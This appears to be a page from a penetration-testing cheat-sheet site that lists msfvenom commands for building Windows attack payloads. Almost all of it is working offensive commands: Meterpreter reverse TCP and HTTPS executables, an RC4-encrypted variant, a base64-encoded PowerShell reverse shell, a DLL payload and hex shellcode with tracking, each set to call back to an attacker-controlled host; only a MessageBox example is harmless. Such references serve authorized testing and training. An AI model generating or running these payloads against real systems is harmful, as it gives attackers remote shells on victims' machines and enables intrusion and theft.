🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸ’£ msfvenom / Windows Payloads

Windows Payloads

Reverse TCP β€” x86

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe

Reverse TCP β€” x64

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe

Reverse HTTPS β€” x64

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<ip> LPORT=443 -f exe > shell.exe

Reverse HTTPS β€” RC4 Encrypted

msfvenom -p windows/meterpreter/reverse_tcp_rc4 \
  LHOST=<ip> LPORT=<port> RC4PASSWORD=<password> -f exe > shell.exe

PowerShell Reverse Shell

msfvenom -a x86 --platform Windows \
  -p windows/powershell_reverse_tcp LHOST=<ip> LPORT=<port> \
  -e cmd/powershell_base64 -i 3 -f raw > shell.ps1

DLL Payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f dll > shell.dll

MessageBox (test payload)

msfvenom -p windows/messagebox TEXT="Hello" TITLE="Test" -f c

Shellcode β€” Hex with UUID Tracking

msfvenom -p windows/x64/meterpreter_reverse_https \
  lhost=<ip> lport=443 \
  PayloadUUIDTracking=true \
  HandlerSSLCert=ssl.pem \
  PayloadUUIDName=<name> \
  -f hex -o shellcode.hex